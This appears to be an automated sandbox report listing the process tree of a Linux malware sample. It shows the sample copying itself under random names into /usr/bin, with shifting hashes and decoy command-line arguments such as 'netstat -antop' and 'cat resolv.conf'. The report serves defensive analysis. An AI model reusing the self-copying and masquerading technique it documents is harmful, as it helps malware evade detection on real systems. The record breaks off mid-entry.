Path:	/tmp/dptxrnhxmx.elf
Arguments:	-
File size:	625878 bytes
MD5 hash:	85682d3effdb2d559fd84df491e9461a

Chronological Activities

Analysis Process: wobaryykiz PID: 6344, Parent PID: 6343

General

Start time (UTC):	15:52:41
Start date (UTC):	29/10/2023
Path:	/usr/bin/wobaryykiz
Arguments:	/usr/bin/wobaryykiz "sleep 1" 6209
File size:	625889 bytes
MD5 hash:	f82e5b84c6eee7c90e56ee733682e625

Chronological Activities

Analysis Process: wobaryykiz PID: 6345, Parent PID: 6344

General

Start time (UTC):	15:52:41
Start date (UTC):	29/10/2023
Path:	/usr/bin/wobaryykiz
Arguments:	-
File size:	625889 bytes
MD5 hash:	f82e5b84c6eee7c90e56ee733682e625

Chronological Activities

Analysis Process: dptxrnhxmx.elf PID: 6346, Parent PID: 6209

General

Start time (UTC):	15:52:41
Start date (UTC):	29/10/2023
Path:	/tmp/dptxrnhxmx.elf
Arguments:	-
File size:	625878 bytes
MD5 hash:	85682d3effdb2d559fd84df491e9461a

Chronological Activities

Analysis Process: dptxrnhxmx.elf PID: 6347, Parent PID: 6346

General

Start time (UTC):	15:52:41
Start date (UTC):	29/10/2023
Path:	/tmp/dptxrnhxmx.elf
Arguments:	-
File size:	625878 bytes
MD5 hash:	85682d3effdb2d559fd84df491e9461a

Chronological Activities

Analysis Process: wobaryykiz PID: 6347, Parent PID: 6346

General

Start time (UTC):	15:52:41
Start date (UTC):	29/10/2023
Path:	/usr/bin/wobaryykiz
Arguments:	/usr/bin/wobaryykiz "ls -la" 6209
File size:	625889 bytes
MD5 hash:	f82e5b84c6eee7c90e56ee733682e625

Chronological Activities

Analysis Process: wobaryykiz PID: 6350, Parent PID: 6347

General

Start time (UTC):	15:52:41
Start date (UTC):	29/10/2023
Path:	/usr/bin/wobaryykiz
Arguments:	-
File size:	625889 bytes
MD5 hash:	f82e5b84c6eee7c90e56ee733682e625

Chronological Activities

Analysis Process: dptxrnhxmx.elf PID: 6348, Parent PID: 6209

General

Start time (UTC):	15:52:41
Start date (UTC):	29/10/2023
Path:	/tmp/dptxrnhxmx.elf
Arguments:	-
File size:	625878 bytes
MD5 hash:	85682d3effdb2d559fd84df491e9461a

Chronological Activities

Analysis Process: dptxrnhxmx.elf PID: 6349, Parent PID: 6348

General

Start time (UTC):	15:52:41
Start date (UTC):	29/10/2023
Path:	/tmp/dptxrnhxmx.elf
Arguments:	-
File size:	625878 bytes
MD5 hash:	85682d3effdb2d559fd84df491e9461a

Chronological Activities

Analysis Process: wobaryykiz PID: 6349, Parent PID: 6348

General

Start time (UTC):	15:52:41
Start date (UTC):	29/10/2023
Path:	/usr/bin/wobaryykiz
Arguments:	/usr/bin/wobaryykiz "netstat -antop" 6209
File size:	625889 bytes
MD5 hash:	f82e5b84c6eee7c90e56ee733682e625

Chronological Activities

Analysis Process: wobaryykiz PID: 6351, Parent PID: 6349

General

Start time (UTC):	15:52:42
Start date (UTC):	29/10/2023
Path:	/usr/bin/wobaryykiz
Arguments:	-
File size:	625889 bytes
MD5 hash:	f82e5b84c6eee7c90e56ee733682e625

Chronological Activities

Analysis Process: dptxrnhxmx.elf PID: 6354, Parent PID: 6209

General

Start time (UTC):	15:52:47
Start date (UTC):	29/10/2023
Path:	/tmp/dptxrnhxmx.elf
Arguments:	-
File size:	625878 bytes
MD5 hash:	85682d3effdb2d559fd84df491e9461a

Chronological Activities

Analysis Process: dptxrnhxmx.elf PID: 6355, Parent PID: 6354

General

Start time (UTC):	15:52:47
Start date (UTC):	29/10/2023
Path:	/tmp/dptxrnhxmx.elf
Arguments:	-
File size:	625878 bytes
MD5 hash:	85682d3effdb2d559fd84df491e9461a

Chronological Activities

Analysis Process: rhlqbltizb PID: 6355, Parent PID: 6354

General

Start time (UTC):	15:52:47
Start date (UTC):	29/10/2023
Path:	/usr/bin/rhlqbltizb
Arguments:	/usr/bin/rhlqbltizb "cat resolv.conf" 6209
File size:	625889 bytes
MD5 hash:	fd558e890aac97ebdd84c36af046ce6a

Chronological Activities

Analysis Process: rhlqbltizb PID: 6356, Parent PID: 6355

General

Start time (UTC):	15:52:47
Start date (UTC):	29/10/2023
Path:	/usr/bin/rhlqbltizb
Arguments:	-
File size:	625889 bytes
MD5 hash:	fd558e890aac97ebdd84c36af046ce6a

Chronological Activities

Analysis Process: dptxrnhxmx.elf PID: 6357, Parent PID: 6209

General

Start time (UTC):	15:52:47
Start date (UTC):	29/10/2023
Path:	/tmp/dptxrnhxmx.elf
Arguments:	-
File size:	625878 bytes
MD5 hash:	85682d3effdb2d559fd84df491e9461a

Chronological Activities

Analysis Process: dptxrnhxmx.elf PID: 6358, Parent PID: 6357

General

Start time (UTC):	15:52:47
Start date (UTC):	29/10/2023
Path:	/tmp/dptxrnhxmx.elf
Arguments:	-
File size:	625878 bytes
MD5 hash:	85682d3effdb2d559fd84df491e9461a

Chronological Activities

Analysis Process: rhlqbltizb PID: 6358, Parent PID: 6357

General

Start time (UTC):	15:52:47
Start date (UTC):	29/10/2023
Path:	/usr/bin/rhlqbltizb
Arguments:	/usr/bin/rhlqbltizb whoami 6209
File size:	625889 bytes
MD5 hash:	fd558e890aac97ebdd84c36af046ce6a

Chronological Activities

Analysis Process: rhlqbltizb PID: 6361, Parent PID: 6358

General

Start time (UTC):	15:52:47
Start date (UTC):	29/10/2023
Path:	/usr/bin/rhlqbltizb
Arguments:	-
File size:	625889 bytes
MD5 hash:	fd558e890aac97ebdd84c36af046ce6a

Chronological Activities

Analysis Process: dptxrnhxmx.elf PID: 6359, Parent PID: 6209

General

Start time (UTC):	15:52:47
Start date (UTC):	29/10/2023
Path:	/tmp/dptxrnhxmx.elf
Arguments:	-
File size:	625878 bytes
MD5 hash:	85682d3effdb2d559fd84df491e9461a

Chronological Activities

Analysis Process: dptxrnhxmx.elf PID: 6360, Parent PID: 6359

General

Start time (UTC):	15:52:47
Start date (UTC):	29/10/2023
Path:	/tmp/dptxrnhxmx.elf
Arguments:	-
File size:	625878 bytes
MD5 hash:	85682d3effdb2d559fd84df491e9461a

Chronological Activities

Analysis Process: rhlqbltizb PID: 6360, Parent PID: 6359

General

Start time (UTC):	15:52:47
Start date (UTC):	29/10/2023
Path:	/usr/bin/rhlqbltizb
Arguments:	/usr/bin/rhlqbltizb "ls -la" 6209
File size:	625889 bytes
MD5 hash:	fd558e890aac97ebdd84c36af046ce6a

Chronological Activities

Analysis Process: rhlqbltizb PID: 6364, Parent PID: 6360

General

Start time (UTC):	15:52:47
Start date (UTC):	29/10/2023
Path:	/usr/bin/rhlqbltizb
Arguments:	-
File size:	625889 bytes
MD5 hash:	fd558e890aac97ebdd84c36af046ce6a

Chronological Activities

Analysis Process: dptxrnhxmx.elf PID: 6362, Parent PID: 6209

General

Start time (UTC):	15:52:47
Start date (UTC):	29/10/2023
Path:	/tmp/dptxrnhxmx.elf
Arguments:	-
File size:	625878 bytes
MD5 hash:	85682d3effdb2d559fd84df491e9461a

Chronological Activities

Analysis Process: dptxrnhxmx.elf PID: 6363, Parent PID: 6362

General

Start time (UTC):	15:52:47
Start date (UTC):	29/10/2023
Path:	/tmp/dptxrnhxmx.elf
Arguments:	-
File size:	625878 bytes
MD5 hash:	85682d3effdb2d559fd84df491e9461a

Chronological Activities

Analysis Process: rhlqbltizb PID: 6363, Parent PID: 6362

General

Start time (UTC):	15:52:47
Start date (UTC):	29/10/2023
Path:	/usr/bin/rhlqbltizb
Arguments:	/usr/bin/rhlqbltizb "route -n" 6209
File size:	625889 bytes
MD5 hash:	fd558e890aac97ebdd84c36af046ce6a

Chronological Activities

Analysis Process: rhlqbltizb PID: 6367, Parent PID: 6363

General

Start time (UTC):	15:52:48
Start date (UTC):	29/10/2023
Path:	/usr/bin/rhlqbltizb
Arguments:	-
File size:	625889 bytes
MD5 hash:	fd558e890aac97ebdd84c36af046ce6a

Chronological Activities

Analysis Process: dptxrnhxmx.elf PID: 6365, Parent PID: 6209

General

Start time (UTC):	15:52:47
Start date (UTC):	29/10/2023
Path:	/tmp/dptxrnhxmx.elf
Arguments:	-
File size:	625878 bytes
MD5 hash:	85682d3effdb2d559fd84df491e9461a

Chronological Activities

Analysis Process: dptxrnhxmx.elf PID: 6366, Parent PID: 6365

General

Start time (UTC):	15:52:47
Start date (UTC):	29/10/2023
Path:	/tmp/dptxrnhxmx.elf
Arguments:	-
File size:	625878 bytes
MD5 hash:	85682d3effdb2d559fd84df491e9461a

Chronological Activities

Analysis Process: rhlqbltizb PID: 6366, Parent PID: 6365

General

Start time (UTC):	15:52:47
Start date (UTC):	29/10/2023
Path:	/usr/bin/rhlqbltizb
Arguments:	/usr/bin/rhlqbltizb "echo \"find\"" 6209
File size:	625889 bytes
MD5 hash:	fd558e890aac97ebdd84c36af046ce6a

Chronological Activities

Analysis Process: rhlqbltizb PID: 6368, Parent PID: 6366

General

Start time (UTC):	15:52:48
Start date (UTC):	29/10/2023
Path:	/usr/bin/rhlqbltizb
Arguments:	-
File size:	625889 bytes
MD5 hash:	fd558e890aac97ebdd84c36af046ce6a

Chronological Activities

Analysis Process: dptxrnhxmx.elf PID: 6371, Parent PID: 6209

General

Start time (UTC):	15:52:53
Start date (UTC):	29/10/2023
Path:	/tmp/dptxrnhxmx.elf
Arguments:	-
File size:	625878 bytes
MD5 hash:	85682d3effdb2d559fd84df491e9461a

Chronological Activities

Analysis Process: dptxrnhxmx.elf PID: 6372, Parent PID: 6371

General

Start time (UTC):	15:52:53
Start date (UTC):	29/10/2023
Path:	/tmp/dptxrnhxmx.elf
Arguments:	-
File size:	625878 bytes
MD5 hash:	85682d3effdb2d559fd84df491e9461a

Chronological Activities

Analysis Process: gcfolkfaec PID: 6372, Parent PID: 6371

General

Start time (UTC):	15:52:53
Start date (UTC):	29/10/2023
Path:	/usr/bin/gcfolkfaec
Arguments:	/usr/bin/gcfolkfaec pwd 6209
File size:	625889 bytes
MD5 hash:	0f3620128a01d72dead621566854b259

Chronological Activities

Analysis Process: gcfolkfaec PID: 6373, Parent PID: 6372

General

Start time (UTC):	15:52:53
Start date (UTC):	29/10/2023
Path:	/usr/bin/gcfolkfaec
Arguments:	-
File size:	625889 bytes
MD5 hash:	0f3620128a01d72dead621566854b259

Chronological Activities

Analysis Process: dptxrnhxmx.elf PID: 6374, Parent PID: 6209

General

Start time (UTC):	15:52:53
Start date (UTC):	29/10/2023
Path:	/tmp/dptxrnhxmx.elf
Arguments:	-
File size:	625878 bytes
MD5 hash:	85682d3effdb2d559fd84df491e9461a

Chronological Activities

Analysis Process: dptxrnhxmx.elf PID: 6375, Parent PID: 6374

General

Start time (UTC):	15:52:53
Start date (UTC):	29/10/2023
Path:	/tmp/dptxrnhxmx.elf
Arguments:	-
File size:	625878 bytes
MD5 hash:	85682d3effdb2d559fd84df491e9461a

Chronological Activities

Analysis Process: gcfolkfaec PID: 6375, Parent PID: 6374

General

Start time (UTC):	15:52:53
Start date (UTC):	29/10/2023
Path:	/usr/bin/gcfolkfaec
Arguments:	/usr/bin/gcfolkfaec whoami 6209
File size:	625889 bytes
MD5 hash:	0f3620128a01d72dead621566854b259

Chronological Activities

Analysis Process: gcfolkfaec PID: 6376, Parent PID: 6375

General

Start time (UTC):	15:52:53
Start date (UTC):	29/10/2023
Path:	/usr/bin/gcfolkfaec
Arguments:	-
File size:	625889 bytes
MD5 hash:	0f3620128a01d72dead621566854b259

Chronological Activities

Analysis Process: dptxrnhxmx.elf PID: 6377, Parent PID: 6209

General

Start time (UTC):	15:52:53
Start date (UTC):	29/10/2023
Path:	/tmp/dptxrnhxmx.elf
Arguments:	-
File size:	625878 bytes
MD5 hash:	85682d3effdb2d559fd84df491e9461a

Chronological Activities

Analysis Process: dptxrnhxmx.elf PID: 6378, Parent PID: 6377

General

Start time (UTC):	15:52:53
Start date (UTC):	29/10/2023
Path:	/tmp/dptxrnhxmx.elf
Arguments:	-
File size:	625878 bytes
MD5 hash:	85682d3effdb2d559fd84df491e9461a

Chronological Activities

Analysis Process: gcfolkfaec PID: 6378, Parent PID: 6377

General

Start time (UTC):	15:52:53
Start date (UTC):	29/10/2023
Path:	/usr/bin/gcfolkfaec
Arguments:	/usr/bin/gcfolkfaec ifconfig 6209
File size:	625889 bytes
MD5 hash:	0f3620128a01d72dead621566854b259

Chronological Activities

Analysis Process: gcfolkfaec PID: 6379, Parent PID: 6378

General

Start time (UTC):	15:52:53
Start date (UTC):	29/10/2023
Path:	/usr/bin/gcfolkfaec
Arguments:	-
File size:	625889 bytes
MD5 hash:	0f3620128a01d72dead621566854b259

Chronological Activities

Analysis Process: dptxrnhxmx.elf PID: 6380, Parent PID: 6209

General

Start time (UTC):	15:52:53
Start date (UTC):	29/10/2023
Path:	/tmp/dptxrnhxmx.elf
Arguments:	-
File size:	625878 bytes
MD5 hash:	85682d3effdb2d559fd84df491e9461a

Chronological Activities

Analysis Process: dptxrnhxmx.elf PID: 6381, Parent PID: 6380

General

Start time (UTC):	15:52:53
Start date (UTC):	29/10/2023
Path:	/tmp/dptxrnhxmx.elf
Arguments:	-
File size:	625878 bytes
MD5 hash:	85682d3effdb2d559fd84df491e9461a

Chronological Activities

Analysis Process: gcfolkfaec PID: 6381, Parent PID: 6380

General

Start time (UTC):	15:52:53
Start date (UTC):	29/10/2023
Path:	/usr/bin/gcfolkfaec
Arguments:	/usr/bin/gcfolkfaec sh 6209
File size:	625889 bytes
MD5 hash:	0f3620128a01d72dead621566854b259

Chronological Activities

Analysis Process: gcfolkfaec PID: 6382, Parent PID: 6381

General

Start time (UTC):	15:52:54
Start date (UTC):	29/10/2023
Path:	/usr/bin/gcfolkfaec
Arguments:	-
File size:	625889 bytes
MD5 hash:	0f3620128a01d72dead621566854b259

Chronological Activities

Analysis Process: dptxrnhxmx.elf PID: 6383, Parent PID: 6209

General

Start time (UTC):	15:52:54
Start date (UTC):	29/10/2023
Path:	/tmp/dptxrnhxmx.elf
Arguments:	-
File size:	625878 bytes
MD5 hash:	85682d3effdb2d559fd84df491e9461a

Chronological Activities

Analysis Process: dptxrnhxmx.elf PID: 6384, Parent PID: 6383

General

Start time (UTC):	15:52:54
Start date (UTC):	29/10/2023
Path:	/tmp/dptxrnhxmx.elf
Arguments:	-
File size:	625878 bytes
MD5 hash:	85682d3effdb2d559fd84df491e9461a

Chronological Activities

Analysis Process: gcfolkfaec PID: 6384, Parent PID: 6383

General

Start time (UTC):	15:52:54
Start date (UTC):	29/10/2023
Path:	/usr/bin/gcfolkfaec
Arguments:	/usr/bin/gcfolkfaec "ifconfig eth0" 6209
File size:	625889 bytes
MD5 hash:	0f3620128a01d72dead621566854b259

Chronological Activities

Analysis Process: gcfolkfaec PID: 6385, Parent PID: 6384

General

Start time (UTC):	15:52:54
Start date (UTC):	29/10/2023
Path:	/usr/bin/gcfolkfaec
Arguments:	-
File size:	625889 bytes
MD5 hash:	0f3620128a01d72dead621566854b259

Chronological Activities

Analysis Process: dptxrnhxmx.elf PID: 6388, Parent PID: 6209

General

Start time (UTC):	15:52:59
Start date (UTC):	29/10/2023
Path:	/tmp/dptxrnhxmx.elf
Arguments:	-
File size:	625878 bytes
MD5 hash:	85682d3effdb2d559fd84df491e9461a

Chronological Activities

Analysis Process: dptxrnhxmx.elf PID: 6389, Parent PID: 6388

General

Start time (UTC):	15:52:59
Start date (UTC):	29/10/2023
Path:	/tmp/dptxrnhxmx.elf
Arguments:	-
File size:	625878 bytes
MD5 hash:	85682d3effdb2d559fd84df491e9461a

Chronological Activities

Analysis Process: scllcnzpeu PID: 6389, Parent PID: 6388

General

Start time (UTC):	15:52:59
Start date (UTC):	29/10/2023
Path:	/usr/bin/scllcnzpeu
Arguments:	/usr/bin/scllcnzpeu "ls -la" 6209
File size:	625889 bytes
MD5 hash:	8ab8f35c125242672f1fdcbf9821815c

Chronological Activities

Analysis Process: scllcnzpeu PID: 6390, Parent PID: 6389

General

Start time (UTC):	15:52:59
Start date (UTC):	29/10/2023
Path:	/usr/bin/scllcnzpeu
Arguments:	-
File size:	625889 bytes
MD5 hash:	8ab8f35c125242672f1fdcbf9821815c

Chronological Activities

Analysis Process: dptxrnhxmx.elf PID: 6391, Parent PID: 6209

General

Start time (UTC):	15:52:59
Start date (UTC):	29/10/2023
Path:	/tmp/dptxrnhxmx.elf
Arguments:	-
File size:	625878 bytes
MD5 hash:	85682d3effdb2d559fd84df491e9461a

Chronological Activities

Analysis Process: dptxrnhxmx.elf PID: 6392, Parent PID: 6391

General

Start time (UTC):	15:52:59
Start date (UTC):	29/10/2023
Path:	/tmp/dptxrnhxmx.elf
Arguments:	-
File size:	625878 bytes
MD5 hash:	85682d3effdb2d559fd84df491e9461a

Chronological Activities

Analysis Process: scllcnzpeu PID: 6392, Parent PID: 6391

General

Start time (UTC):	15:52:59
Start date (UTC):	29/10/2023
Path:	/usr/bin/scllcnzpeu
Arguments:	/usr/bin/scllcnzpeu bash 6209
File size:	625889 bytes
MD5 hash:	8ab8f35c125242672f1fdcbf9821815c

Chronological Activities

Analysis Process: scllcnzpeu PID: 6393, Parent PID: 6392

General

Start time (UTC):	15:52:59
Start date (UTC):	29/10/2023
Path:	/usr/bin/scllcnzpeu
Arguments:	-
File size:	625889 bytes
MD5 hash:	8ab8f35c125242672f1fdcbf9821815c

Chronological Activities

Analysis Process: dptxrnhxmx.elf PID: 6394, Parent PID: 6209

General

Start time (UTC):	15:52:59
Start date (UTC):	29/10/2023
Path:	/tmp/dptxrnhxmx.elf
Arguments:	-
File size:	625878 bytes
MD5 hash:	85682d3effdb2d559fd84df491e9461a

Chronological Activities

Analysis Process: dptxrnhxmx.elf PID: 6395, Parent PID: 6394

General

Start time (UTC):	15:52:59
Start date (UTC):	29/10/2023
Path:	/tmp/dptxrnhxmx.elf
Arguments:	-
File size:	625878 bytes
MD5 hash:	85682d3effdb2d559fd84df491e9461a

Chronological Activities

Analysis Process: scllcnzpeu PID: 6395, Parent PID: 6394

General

Start time (UTC):	15:52:59
Start date (UTC):	29/10/2023
Path:	/usr/bin/scllcnzpeu
Arguments:	/usr/bin/scllcnzpeu "grep \"A\"" 6209
File size:	625889 bytes
MD5 hash:	8ab8f35c125242672f1fdcbf9821815c

Chronological Activities

Analysis Process: scllcnzpeu PID: 6396, Parent PID: 6395

General

Start time (UTC):	15:52:59
Start date (UTC):	29/10/2023
Path:	/usr/bin/scllcnzpeu
Arguments:	-
File size:	625889 bytes
MD5 hash:	8ab8f35c125242672f1fdcbf9821815c

Chronological Activities

Analysis Process: dptxrnhxmx.elf PID: 6397, Parent PID: 6209

General

Start time (UTC):	15:52:59
Start date (UTC):	29/10/2023
Path:	/tmp/dptxrnhxmx.elf
Arguments:	-
File size:	625878 bytes
MD5 hash:	85682d3effdb2d559fd84df491e9461a

Chronological Activities

Analysis Process: dptxrnhxmx.elf PID: 6398, Parent PID: 6397

General

Start time (UTC):	15:52:59
Start date (UTC):	29/10/2023
Path:	/tmp/dptxrnhxmx.elf
Arguments:	-
File size:	625878 bytes
MD5 hash:	85682d3effdb2d559fd84df491e9461a

Chronological Activities

Analysis Process: scllcnzpeu PID: 6398, Parent PID: 6397

General

Start time (UTC):	15:52:59
Start date (UTC):	29/10/2023
Path:	/usr/bin/scllcnzpeu
Arguments:	/usr/bin/scllcnzpeu "cat resolv.conf" 6209
File size:	625889 bytes
MD5 hash:	8ab8f35c125242672f1fdcbf9821815c

Chronological Activities

Analysis Process: scllcnzpeu PID: 6399, Parent PID: 6398

General

Start time (UTC):	15:53:00
Start date (UTC):	29/10/2023
Path:	/usr/bin/scllcnzpeu
Arguments:	-
File size:	625889 bytes
MD5 hash:	8ab8f35c125242672f1fdcbf9821815c

Chronological Activities

Analysis Process: dptxrnhxmx.elf PID: 6400, Parent PID: 6209

General

Start time (UTC):	15:53:00
Start date (UTC):	29/10/2023
Path:	/tmp/dptxrnhxmx.elf
Arguments:	-
File size:	625878 bytes
MD5 hash:	85682d3effdb2d559fd84df491e9461a

Chronological Activities

Analysis Process: dptxrnhxmx.elf PID: 6401, Parent PID: 6400

General

Start time (UTC):	15:53:00
Start date (UTC):	29/10/2023
Path:	/tmp/dptxrnhxmx.elf
Arguments:	-
File size:	625878 bytes
MD5 hash:	85682d3effdb2d559fd84df491e9461a

Chronological Activities

Analysis Process: scllcnzpeu PID: 6401, Parent PID: 6400

General

Start time (UTC):	15:53:00
Start date (UTC):	29/10/2023
Path:	/usr/bin/scllcnzpeu
Arguments:	/usr/bin/scllcnzpeu who 6209
File size:	625889 bytes
MD5 hash:	8ab8f35c125242672f1fdcbf9821815c

Chronological Activities

Analysis Process: scllcnzpeu PID: 6402, Parent PID: 6401

General

Start time (UTC):	15:53:00
Start date (UTC):	29/10/2023
Path:	/usr/bin/scllcnzpeu
Arguments:	-
File size:	625889 bytes
MD5 hash:	8ab8f35c125242672f1fdcbf9821815c

Chronological Activities

Analysis Process: dptxrnhxmx.elf PID: 6406, Parent PID: 6209

General

Start time (UTC):	15:53:05
Start date (UTC):	29/10/2023
Path:	/tmp/dptxrnhxmx.elf
Arguments:	-
File size:	625878 bytes
MD5 hash:	85682d3effdb2d559fd84df491e9461a

Chronological Activities

Analysis Process: dptxrnhxmx.elf PID: 6407, Parent PID: 6406

General

Start time (UTC):	15:53:05
Start date (UTC):	29/10/2023
Path:	/tmp/dptxrnhxmx.elf
Arguments:	-
File size:	625878 bytes
MD5 hash:	85682d3effdb2d559fd84df491e9461a

Chronological Activities

Analysis Process: tgdthymawi PID: 6407, Parent PID: 6406

General

Start time (UTC):	15:53:05
Start date (UTC):	29/10/2023
Path:	/usr/bin/tgdthymawi
Arguments:	/usr/bin/tgdthymawi "netstat -an" 6209
File size:	625889 bytes
MD5 hash:	44b0b9a89834d2fcf626817cb38d28b6

Chronological Activities

Analysis Process: tgdthymawi PID: 6408, Parent PID: 6407

General

Start time (UTC):	15:53:05
Start date (UTC):	29/10/2023
Path:	/usr/bin/tgdthymawi
Arguments:	-
File size:	625889 bytes
MD5 hash:	44b0b9a89834d2fcf626817cb38d28b6

Chronological Activities

Analysis Process: dptxrnhxmx.elf PID: 6409, Parent PID: 6209

General

Start time (UTC):	15:53:05
Start date (UTC):	29/10/2023
Path:	/tmp/dptxrnhxmx.elf
Arguments:	-
File size:	625878 bytes
MD5 hash:	85682d3effdb2d559fd84df491e9461a

Chronological Activities

Analysis Process: dptxrnhxmx.elf PID: 6410, Parent PID: 6409

General

Start time (UTC):	15:53:05
Start date (UTC):	29/10/2023
Path:	/tmp/dptxrnhxmx.elf
Arguments:	-
File size:	625878 bytes
MD5 hash:	85682d3effdb2d559fd84df491e9461a

Chronological Activities

Analysis Process: tgdthymawi PID: 6410, Parent PID: 6409

General

Start time (UTC):	15:53:05
Start date (UTC):	29/10/2023
Path:	/usr/bin/tgdthymawi
Arguments:	/usr/bin/tgdthymawi gnome-terminal 6209
File size:	625889 bytes
MD5 hash:	44b0b9a89834d2fcf626817cb38d28b6

Chronological Activities

Analysis Process: tgdthymawi PID: 6411, Parent PID: 6410

General

Start time (UTC):	15:53:05
Start date (UTC):	29/10/2023
Path:	/usr/bin/tgdthymawi
Arguments:	-
File size:	625889 bytes
MD5 hash:	44b0b9a89834d2fcf626817cb38d28b6

Chronological Activities

Analysis Process: dptxrnhxmx.elf PID: 6414, Parent PID: 6209

General

Start time (UTC):	15:53:05
Start date (UTC):	29/10/2023
Path:	/tmp/dptxrnhxmx.elf
Arguments:	-
File size:	625878 bytes
MD5 hash:	85682d3effdb2d559fd84df491e9461a

Chronological Activities

Analysis Process: dptxrnhxmx.elf PID: 6415, Parent PID: 6414

General

Start time (UTC):	15:53:05
Start date (UTC):	29/10/2023
Path:	/tmp/dptxrnhxmx.elf
Arguments:	-
File size:	625878 bytes
MD5 hash:	85682d3effdb2d559fd84df491e9461a

Chronological Activities

Analysis Process: tgdthymawi PID: 6415, Parent PID: 6414

General

Start time (UTC):	15:53:05
Start date (UTC):	29/10/2023
Path:	/usr/bin/tgdthymawi
Arguments:	/usr/bin/tgdthymawi "ifconfig eth0" 6209
File size:	625889 bytes
MD5 hash:	44b0b9a89834d2fcf626817cb38d28b6

Chronological Activities

Analysis Process: tgdthymawi PID: 6416, Parent PID: 6415

General

Start time (UTC):	15:53:05
Start date (UTC):	29/10/2023
Path:	/usr/bin/tgdthymawi
Arguments:	-
File size:	625889 bytes
MD5 hash:	44b0b9a89834d2fcf626817cb38d28b6

Chronological Activities

Analysis Process: dptxrnhxmx.elf PID: 6417, Parent PID: 6209

General

Start time (UTC):	15:53:05
Start date (UTC):	29/10/2023
Path:	/tmp/dptxrnhxmx.elf
Arguments:	-
File size:	625878 bytes
MD5 hash:	85682d3effdb2d559fd84df491e9461a

Chronological Activities

Analysis Process: dptxrnhxmx.elf PID: 6418, Parent PID: 6417

General

Start time (UTC):	15:53:05
Start date (UTC):	29/10/2023
Path:	/tmp/dptxrnhxmx.elf
Arguments:	-
File size:	625878 bytes
MD5 hash:	85682d3effdb2d559fd84df491e9461a

Chronological Activities

Analysis Process: tgdthymawi PID: 6418, Parent PID: 6417

General

Start time (UTC):	15:53:05
Start date (UTC):	29/10/2023
Path:	/usr/bin/tgdthymawi
Arguments:	/usr/bin/tgdthymawi "cd /etc" 6209
File size:	625889 bytes
MD5 hash:	44b0b9a89834d2fcf626817cb38d28b6

Chronological Activities

Analysis Process: tgdthymawi PID: 6420, Parent PID: 6418

General

Start time (UTC):	15:53:05
Start date (UTC):	29/10/2023
Path:	/usr/bin/tgdthymawi
Arguments:	-
File size:	625889 bytes
MD5 hash:	44b0b9a89834d2fcf626817cb38d28b6

Chronological Activities

Analysis Process: dptxrnhxmx.elf PID: 6419, Parent PID: 6209

General

Start time (UTC):	15:53:05
Start date (UTC):	29/10/2023
Path:	/tmp/dptxrnhxmx.elf
Arguments:	-
File size:	625878 bytes
MD5 hash:	85682d3effdb2d559fd84df491e9461a

Chronological Activities

Analysis Process: dptxrnhxmx.elf PID: 6421, Parent PID: 6419

General

Start time (UTC):	15:53:05
Start date (UTC):	29/10/2023
Path:	/tmp/dptxrnhxmx.elf
Arguments:	-
File size:	625878 bytes
MD5 hash:	85682d3effdb2d559fd84df491e9461a

Chronological Activities

Analysis Process: tgdthymawi PID: 6421, Parent PID: 1860

General

Start time (UTC):	15:53:05
Start date (UTC):	29/10/2023
Path:	/usr/bin/tgdthymawi
Arguments:	/usr/bin/tgdthymawi "sleep 1" 6209
File size:	625889 bytes
MD5 hash:	44b0b9a89834d2fcf626817cb38d28b6

Chronological Activities

Analysis Process: tgdthymawi PID: 6422, Parent PID: 6421

General

Start time (UTC):	15:53:05
Start date (UTC):	29/10/2023
Path:	/usr/bin/tgdthymawi
Arguments:	-
File size:	625889 bytes
MD5 hash:	44b0b9a89834d2fcf626817cb38d28b6

Chronological Activities

Analysis Process: dptxrnhxmx.elf PID: 6425, Parent PID: 6209

General

Start time (UTC):	15:53:11
Start date (UTC):	29/10/2023
Path:	/tmp/dptxrnhxmx.elf
Arguments:	-
File size:	625878 bytes
MD5 hash:	85682d3effdb2d559fd84df491e9461a

Chronological Activities

Analysis Process: dptxrnhxmx.elf PID: 6426, Parent PID: 6425

General

Start time (UTC):	15:53:11
Start date (UTC):	29/10/2023
Path:	/tmp/dptxrnhxmx.elf
Arguments:	-
File size:	625878 bytes
MD5 hash:	85682d3effdb2d559fd84df491e9461a

Chronological Activities

Analysis Process: drdxrfohux PID: 6426, Parent PID: 6425

General

Start time (UTC):	15:53:11
Start date (UTC):	29/10/2023
Path:	/usr/bin/drdxrfohux
Arguments:	/usr/bin/drdxrfohux "ps -ef" 6209
File size:	625900 bytes
MD5 hash:	fae507cacb8ef11ece2641d2443b133c

Chronological Activities

Analysis Process: drdxrfohux PID: 6429, Parent PID: 6426

General

Start time (UTC):	15:53:11
Start date (UTC):	29/10/2023
Path:	/usr/bin/drdxrfohux
Arguments:	-
File size:	625900 bytes
MD5 hash:	fae507cacb8ef11ece2641d2443b133c

Chronological Activities

Analysis Process: dptxrnhxmx.elf PID: 6427, Parent PID: 6209

General

Start time (UTC):	15:53:11
Start date (UTC):	29/10/2023
Path:	/tmp/dptxrnhxmx.elf
Arguments:	-
File size:	625878 bytes
MD5 hash:	85682d3effdb2d559fd84df491e9461a

Chronological Activities

Analysis Process: dptxrnhxmx.elf PID: 6428, Parent PID: 6427

General

Start time (UTC):	15:53:11
Start date (UTC):	29/10/2023
Path:	/tmp/dptxrnhxmx.elf
Arguments:	-
File size:	625878 bytes
MD5 hash:	85682d3effdb2d559fd84df491e9461a

Chronological Activities

Analysis Process: drdxrfohux PID: 6428, Parent PID: 1860

General

Start time (UTC):	15:53:11
Start date (UTC):	29/10/2023
Path:	/usr/bin/drdxrfohux
Arguments:	/usr/bin/drdxrfohux "netstat -antop" 6209
File size:	625900 bytes
MD5 hash:	fae507cacb8ef11ece2641d2443b133c

Chronological Activities

Analysis Process: drdxrfohux PID: 6433, Parent PID: 6428

General

Start time (UTC):	15:53:11
Start date (UTC):	29/10/2023
Path:	/usr/bin/drdxrfohux
Arguments:	-
File size:	625900 bytes
MD5 hash:	fae507cacb8ef11ece2641d2443b133c

Chronological Activities

Analysis Process: dptxrnhxmx.elf PID: 6430, Parent PID: 6209

General

Start time (UTC):	15:53:11
Start date (UTC):	29/10/2023
Path:	/tmp/dptxrnhxmx.elf
Arguments:	-
File size:	625878 bytes
MD5 hash:	85682d3effdb2d559fd84df491e9461a

Chronological Activities

Analysis Process: dptxrnhxmx.elf PID: 6431, Parent PID: 6430

General

Start time (UTC):	15:53:11
Start date (UTC):	29/10/2023
Path:	/tmp/dptxrnhxmx.elf
Arguments:	-
File size:	625878 bytes
MD5 hash:	85682d3effdb2d559fd84df491e9461a

Chronological Activities

Analysis Process: drdxrfohux PID: 6431, Parent PID: 1860

General

